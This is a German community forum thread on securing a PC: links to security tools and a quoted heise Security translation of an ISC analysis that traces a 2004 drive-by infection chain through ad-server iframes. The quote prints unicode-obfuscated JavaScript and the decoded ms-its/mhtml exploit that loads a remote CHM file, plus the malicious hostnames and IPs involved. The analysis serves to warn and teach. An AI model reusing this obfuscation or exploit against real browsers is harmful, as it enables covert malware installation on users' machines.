Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/sporkevi/eving-forum-smf/forum/Sources/Load.php(225) : runtime-created function on line 3

Warning: Creating default object from empty value in /www/htdocs/sporkevi/eving-forum-smf/mkportal/include/SMF/smf_out.php on line 48

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/sporkevi/eving-forum-smf/mkportal/include/functions.php on line 1473

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/sporkevi/eving-forum-smf/mkportal/include/functions.php on line 1474

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/sporkevi/eving-forum-smf/mkportal/include/functions.php on line 1475

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/sporkevi/eving-forum-smf/mkportal/include/functions.php on line 1473

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/sporkevi/eving-forum-smf/mkportal/include/functions.php on line 1474

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/sporkevi/eving-forum-smf/mkportal/include/functions.php on line 1475
Wie bekomme ich den PC sauber bzw. wie wird er sicher
 
Dortmund Eving und mehr, eine Seite für Evinger
18. Juli 2018, 00:21:51 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
 
   Übersicht   Hilfe Suche Kalender Mitglieder Contact Tags Einloggen Registrieren  
Seiten: [1]   Nach unten
  Drucken  
Autor Thema: Wie bekomme ich den PC sauber bzw. wie wird er sicher  (Gelesen 3837 mal)
Nike
Administrator


Karma: 1
Offline Offline

Geschlecht: Männlich
Beiträge: 2419


WWW
« am: 24. Februar 2005, 14:32:59 »

Virenprogramme

http://www.bitdefender.de/bd/site/page.php

http://www.lavasoft.de


Firewall

http://www.kerio.com/us/kpf_download.html

Spybot ->

http://www.chip.de/downloads/c_downloads_8833199.html

http://www.chip.de/downloads/c_downloads_11353799.html

Bitte schaut auch hin, das ihr immer die aktuellste Version habt!
Gespeichert
Anonymous
Gast
« Antworten #1 am: 28. Februar 2005, 13:46:04 »

Zitat
Schädlingen auf der Spur

Dies ist ein Tagebucheintrag des Diensthabenden im Internet Storm Center. heise Security veröffentlicht die deutsche Übersetzung mit freundlicher Genehmigung des ISC und des Autors Tom Liston. Das Original finden Sie hier.

Nachdem ich einige Adware/Spyware/Malware-Programme untersucht hatte, entschloss ich mich zu einem Experiment. Ich wollte wirklich sehen wie schnell ein ungepatchtes System kompromittiert wird -- und wie das aus der Sicht eines "Otto Normal"-Anwenders aussieht. Ich setzte dazu ein VMWare-Image einer neuen Windows-XP-Home-Installation auf und machte mich auf ins Internet. Auf dieser aufschlussreichen Reise begegnete ich einer Reihe von Gefahren, die auf den unachtsamen Wanderer lauern und ich lernte einiges über die Spy-/Adware-Industrie.

Dies ist der erste Teil meiner Analyse dessen, was mir alles zustieß, als ich die im Internet notwendigen Schutzmaßnahmen "vergaß". Der zweite Teil untersucht das volle Ausmaß des Schadens, der dem armen "Otto Normalo" zugefügt wurde. Als kleiner Vorgeschmack kann ich schon hier sagen: Wenn es nach der Adware/Spyware-Industrie geht, haben Sie zwar den PC gekauft -- aber DIE bestimmen darüber. Die unverschämte Dreistigkeit ihres Vorgehens wird Sie überraschen und ich hoffe, diese Lektüre bewegt den ein oder anderen Leser dazu, aufzuwachen und etwas zu unternehmen.

Offensichtlich hängt das, was in diesem Experiment passiert, davon ab, wohin ich im Netz gehe. Um fair zu sein: Die im Folgenden erwähnten Sites sind nicht wirklich was besonderes -- im Gegenteil: Sie sind nicht schlimmer oder besser als viele andere Ad-/Spyware-Seiten. Meine Auswahl orientierte sich an dem Vorfall, den ich ohnehin gerade untersucht hatte.

Für meinen "Otto Normalo" baute ich so gut wie möglich das gerade untersuchte System nach. Darauf lief ein Internet Explorer 6.0 mit Google Toolbar und aktviertem Popup-Blocker. Behalten Sie diese Konfiguration im Hinterkopf, wenn ich "der Spur der Schädlinge" folge.

Noch etwas, sas Sie nicht vergessen sollten: Ich werde keine der erwähnten URLs in dieser Geschichte als aktive Links setzen. Das ist Absicht. FOLGEN SIE KEINEN URLs IN DIESEM ARTIKEL, BESONDERS DANN NICHT, WENN IHR SYSTEM NICHT VOLLSTÄNDIG GEPACHT IST. SIE SIND GEMEINT. ECHT.

[Anm. des Übersetzers: Zum Zeitpunkt der Veröffentlichung unserer Übersetzung existierten die angebenen URLs immer noch. Die Warnung des Autors ist also durchaus ernst zu nehmen.]

Nachdem ich die Google Toolbar installiert hatte, machte ich dasselbe, wie mein "Otto Normalo", als er sich sein System infiziert hatte: Ich habe gegoogelt. Jemand hatte ihm von "Yahoo Games" erzählt und er wollte sich das mal ansehen. Ich gab bei Google "Yahoo Games" ein und übersprang (warum auch immer... schließlich machte das auch mein "Otto Normalo") ein paar Links, die offensichtlich zu Yahoo! führten. Statt dessen klickte ich auf "www.yahoogamez.com" (ACHTUNG: Wenn ihr System nicht voll gepacht ist, GEHEN SIE DA NICHT HIN).

Web-Seite Yahoo Gamez    
Auf den ersten Blick erscheint die Seite völlig harmlos.

yahoogamez.com ist eine Web-Seite mit Links zu vielen verschiedenen Online-Spielen. Ich weiß zwar nicht, ob die Spiele was taugen, aber die Werbung dort ist ziemlich interessant. Wie bei vielen Web-Sites, die Online-Spiele anbieten, beruht das Geschäftsmodell darauf, Leute auf die Seite zu leiten und über die dort eingebauten Anzeigen Geld zu verdienen. Dabei hängt der Umsatz davon ab, wie oft eine Anzeige erscheint und ganz besonders davon, wie oft darauf geklickt wird. In der Regel hat der Seitenbetreiber einen Vertrag mit einem Zwischenhändler, der an Werbekunden "Platzierungen" auf den Seiten verkauft, mit deren Betreibern er Verträge hat. Die meisten dieser Online-Anzeigenfirmen stellen dann Server bereit, die dann den Code und die Anzeigenmotive an die teilnehmenden Web-Sites ausliefern.

Auf der Site von yahoogamez.com werden an zwei Stellen Anzeigen eingeblendet, die "aim4media.com" bereitstellt. Wenn man die yahoogamez-Seite aufruft, gibt es einen Sturm von HTTP-Anfragen, darunter die folgende:

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Sie liefert den folgenden HTML-Code zurück:

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0'
 style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html"
 width=468 height=60 hspace=0 vspace=0 frameborder=0
 marginheight=0 marginwidth=0 scrolling=no>
<a href="http://205.236.189.58/mynet/mynet-MML.html"
 target="_blank">
 <img width=468 height=60
  src="http://205.236.189.58/mynet/mynet-MML.html"border=0>
</a>
</iframe><div id="beacon_459" style="
 position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&
amp;clientid=431&amp;zoneid=450&amp;source=&amp;
block=86400&amp;capping=3&amp;cb=7da741942b0623acd85070683ffa3ad8'
 width='0' height='0' alt='' style='width: 0px; height: 0px;'>
</div>
</body>
</html>

Der iFrame erzeugt wieder einen HTTP-GET-Aufruf:

[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

der den folgenden HTML-Code herunterlädt:

<a href="http://www.lovemynet.com/?frombanner2"
 target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif"
 width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

Das sieht ganz so aus, als wollte jemand etwas verstecken. Dekodiert ergibt es:

<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

was dann das hier liefert:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>

Dekodiert ergibt das:

<textarea id="code" style="display:none;">
 <object
 data="ms-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
</textarea>
<script language="javascript">
 document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
</script>

[Anm. des Übersetzers: Das ist offensichtlich der Exploit, der im Browsercheck als "Installieren und Ausführen von Dateien via mhtml-Redirect" demonstriert wird. Das "m" aus dem URI "ms-its:" kodiert der Autor dieses Exploits über die HTML-Darstellung m -- wahrscheinlich, um die Erkennung durch Filter und Antiviren-Software weiter zu erschweren.]


aus hier ->

http://www.heise.de/security/artikel/49687
Gespeichert
Anonymous
Gast
« Antworten #2 am: 28. Februar 2005, 14:04:53 »

http://www.heise.de/security/artikel/53746
Gespeichert
Nike
Administrator


Karma: 1
Offline Offline

Geschlecht: Männlich
Beiträge: 2419


WWW
« Antworten #3 am: 03. Juni 2005, 20:44:21 »

http://www.neuber.com/taskmanager/deutsch/index.html
Gespeichert
Tags:
Seiten: [1]   Nach oben
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.15 | SMF © 2006, Simple Machines Prüfe XHTML 1.0 Prüfe CSS
Seite erstellt in 0.042 Sekunden mit 20 Zugriffen.

MKPortal ©2003-2008 mkportal.it